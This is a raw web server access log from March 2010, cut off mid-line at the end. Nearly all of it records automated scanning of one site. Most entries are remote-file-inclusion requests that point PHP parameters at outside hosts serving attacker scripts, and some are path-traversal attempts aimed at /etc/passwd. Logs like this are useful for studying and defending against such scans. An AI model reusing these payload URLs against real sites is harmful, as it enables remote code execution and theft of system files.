200.93.147.154 - - [03/Mar/2010:14:03:15 -0800] "GET /logs/access_100218.log%20%20//delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:03:31 -0800] "GET /logs/access_100204.log%20%20/home.php?index=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:14:03:44 -0800] "GET //bbs//write_update_good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:14:03:44 -0800] "GET /logs/access_100219.log%20%20///bbs//write_update_good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:14:03:45 -0800] "GET /logs///bbs//write_update_good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:14:03:52 -0800] "GET /logs/access_100225.log%20%20///bbs//write_update_good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:03:58 -0800] "GET /logs/access_100218.log/home.php?index=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:03:58 -0800] "GET /logs/home.php?index=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:03:59 -0800] "GET /home.php?index=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:04:03 -0800] "GET /logs/access_100204.log/home.php?index=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:04:24 -0800] "GET /error.php?dir=http://www.voiptechnocrats.com/command/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:04:24 -0800] "GET /logs//error.php?dir=http://www.voiptechnocrats.com/command/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:04:24 -0800] "GET /logs/access_100214.log//error.php?dir=http://www.voiptechnocrats.com/command/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:04:31 -0800] "GET /logs/access_100214.log//error.php?dir=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:04:33 -0800] "GET /logs/access_100213.log//error.php?dir=http://www.voiptechnocrats.com/command/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:04:39 -0800] "GET /logs/access_100213.log//error.php?dir=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:14:05:00 -0800] "GET //bbs//zero.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:14:05:00 -0800] "GET /logs/access_100221.log%20%20///bbs//zero.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:14:05:00 -0800] "GET /logs///bbs//zero.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:05:00 -0800] "GET /logs/access_100217.log/admin.php?include_path=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:05:00 -0800] "GET /logs/admin.php?include_path=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:05:00 -0800] "GET /admin.php?include_path=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:05:05 -0800] "GET /logs/access_100204.log/admin.php?include_path=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:05:19 -0800] "GET /logs/access_100213.log%20%20//index.php?DOCUMENT_ROOT=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:06:48 -0800] "GET /logs/access_100218.log//index.php?DOCUMENT_ROOT=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [03/Mar/2010:14:09:22 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
220.232.247.197 - - [03/Mar/2010:14:09:29 -0800] "GET /logs/access_100214.log//error.php?dir=http://mapotuntun.co.kr/data/log/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.247.197 - - [03/Mar/2010:14:09:29 -0800] "GET /error.php?dir=http://mapotuntun.co.kr/data/log/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.247.197 - - [03/Mar/2010:14:09:29 -0800] "GET /logs//error.php?dir=http://mapotuntun.co.kr/data/log/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.247.197 - - [03/Mar/2010:14:09:38 -0800] "GET /logs/access_100213.log//error.php?dir=http://mapotuntun.co.kr/data/log/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:09:39 -0800] "GET /logs/admin.php?include_path=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:09:39 -0800] "GET /logs/access_100217.log/admin.php?include_path=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:09:39 -0800] "GET /admin.php?include_path=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:10:09 -0800] "GET /logs/access_100131.log//common/db.php?commonpath=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:10:09 -0800] "GET /logs/access_100126.log//common/db.php?commonpath=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:14:11:07 -0800] "GET /logs/access_100226.log%20%20/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:14:11:07 -0800] "GET /logs/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:14:11:08 -0800] "GET /errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.80.193.34 - - [03/Mar/2010:14:11:24 -0800] "GET / HTTP/1.0" 200 3626 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {2FDA862C-A7CB-48EC-849F-0A987A999F43}; .NET CLR 1.1.4322)" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:14:11:39 -0800] "GET /logs/access_100129.log%20%20/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:12:15 -0800] "GET /logs/access_100213.log%20%20//error.php?dir=http://www.voiptechnocrats.com/command/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:12:15 -0800] "GET /logs/access_100214.log%20%20//error.php?dir=http://www.voiptechnocrats.com/command/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:14:13:02 -0800] "GET /logs/access_100129.log%20%20/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:13:06 -0800] "GET /logs/access_100213.log%20%20//error.php?dir=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:13:06 -0800] "GET /logs/access_100214.log%20%20//error.php?dir=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:14:13:10 -0800] "GET //bbs//write_update2.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:14:13:10 -0800] "GET /logs///bbs//write_update2.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:14:13:10 -0800] "GET /logs/access_100221.log%20%20///bbs//write_update2.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:14:13:11 -0800] "GET /logs///bbs//write_update2_1.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:14:13:11 -0800] "GET //bbs//write_update2_1.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:14:13:11 -0800] "GET /logs/access_100221.log%20%20///bbs//write_update2_1.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:14:13:20 -0800] "GET /board/bbs/write_update.php?board_skin_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:14:13:21 -0800] "GET /board/bbs/write_update.php?board_skin_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
220.232.247.197 - - [03/Mar/2010:14:13:42 -0800] "GET /logs/access_100213.log%20%20//index.php?DOCUMENT_ROOT=http://mapotuntun.co.kr/data/log/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:14:14:12 -0800] "GET /logs/access_100226.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:14:14:12 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:14:14:12 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.247.197 - - [03/Mar/2010:14:14:35 -0800] "GET /logs/access_100218.log//index.php?DOCUMENT_ROOT=http://mapotuntun.co.kr/data/log/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:14:42 -0800] "GET /logs/access_100131.log//common/db.php?commonpath=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [03/Mar/2010:14:14:43 -0800] "GET /logs/access_100220.log//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [03/Mar/2010:14:15:01 -0800] "GET /logs/access_100128.log//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:14:15:12 -0800] "GET /logs/access_100219.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:15:16 -0800] "GET /logs/access_100126.log//common/db.php?commonpath=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:16:18 -0800] "GET /admin.php?include_path=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:16:18 -0800] "GET /logs/access_100217.log%20%20/admin.php?include_path=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:16:18 -0800] "GET /logs/admin.php?include_path=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:16:22 -0800] "GET /logs/access_100204.log%20%20/admin.php?include_path=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.247.197 - - [03/Mar/2010:14:16:44 -0800] "GET /logs/access_100214.log%20%20//error.php?dir=http://mapotuntun.co.kr/data/log/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.247.197 - - [03/Mar/2010:14:16:44 -0800] "GET /logs/access_100213.log%20%20//error.php?dir=http://mapotuntun.co.kr/data/log/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.63.198.34 - - [03/Mar/2010:14:16:49 -0800] "GET /ideal/forum/viewtopic.php?p=18445 HTTP/1.1" 404 5258 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.puaga.com"
78.46.87.243 - - [03/Mar/2010:14:20:20 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.redplanetaria.com/4/dump/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [03/Mar/2010:14:20:20 -0800] "GET /logs/access_100202.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.redplanetaria.com/4/dump/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [03/Mar/2010:14:20:20 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.redplanetaria.com/4/dump/etenid1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [03/Mar/2010:14:20:50 -0800] "GET /logs/access_100129.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.redplanetaria.com/4/dump/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:14:20:59 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:14:21:40 -0800] "GET /logs/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:14:21:40 -0800] "GET /errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:14:21:40 -0800] "GET /logs/access_100226.log%20%20/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:14:21:42 -0800] "GET /errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:14:21:42 -0800] "GET /logs/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:14:21:42 -0800] "GET /logs/access_100226.log%20%20/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:14:23:00 -0800] "GET /logs/access_100212.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:14:23:00 -0800] "GET /logs/access_100224.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:14:23:00 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:14:23:00 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:14:23:16 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:14:23:16 -0800] "GET /logs/access_100224.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:14:23:16 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:14:23:16 -0800] "GET /logs/access_100212.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:14:23:21 -0800] "GET /logs/access_100129.log%20%20/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:14:23:23 -0800] "GET /logs/access_100129.log%20%20/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [03/Mar/2010:14:23:45 -0800] "GET /logs/access_100202.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.redplanetaria.com/4/dump/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [03/Mar/2010:14:24:14 -0800] "GET /logs/access_100129.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.redplanetaria.com/4/dump/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:24:39 -0800] "GET /inc.php?dir=http://www.voiptechnocrats.com/command/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:24:39 -0800] "GET /logs//inc.php?dir=http://www.voiptechnocrats.com/command/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:24:39 -0800] "GET /logs/access_100130.log%20%20//inc.php?dir=http://www.voiptechnocrats.com/command/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:24:56 -0800] "GET /logs/access_100130.log%20%20//inc.php?dir=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:24:57 -0800] "GET /inc.php?dir=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:24:57 -0800] "GET /logs//inc.php?dir=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:25:57 -0800] "GET /admin.php?include_path=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:25:57 -0800] "GET /logs/access_100217.log/admin.php?include_path=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:25:57 -0800] "GET /logs/admin.php?include_path=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:26:25 -0800] "GET /logs/access_100219.log%20%20//inc.php?dir=http://www.voiptechnocrats.com/command/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:26:45 -0800] "GET /logs/access_100219.log%20%20//inc.php?dir=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:26:49 -0800] "GET /logs/access_100204.log/admin.php?include_path=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:26:56 -0800] "GET /logs/admin.php?include_path=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [03/Mar/2010:14:27:02 -0800] "GET /logs/access_100220.log//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.40 - - [03/Mar/2010:14:27:02 -0800] "GET /logs/access_100128.log//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:14:27:36 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:14:27:36 -0800] "GET /logs/access_100226.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:27:44 -0800] "GET /logs/access_100217.log/admin.php?include_path=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:27:46 -0800] "GET /admin.php?include_path=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:14:28:04 -0800] "GET /logs/access_100226.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:28:10 -0800] "GET /logs/access_100204.log/admin.php?include_path=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:14:28:14 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:28:37 -0800] "GET /logs/access_100217.log%20%20/admin.php?include_path=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:28:37 -0800] "GET /admin.php?include_path=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:28:37 -0800] "GET /logs/admin.php?include_path=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:14:28:41 -0800] "GET /logs/access_100204.log%20%20/admin.php?include_path=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:14:28:59 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:14:29:00 -0800] "GET /logs/access_100226.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:14:29:02 -0800] "GET /kboard.php?board=notice&act=write&no=3&page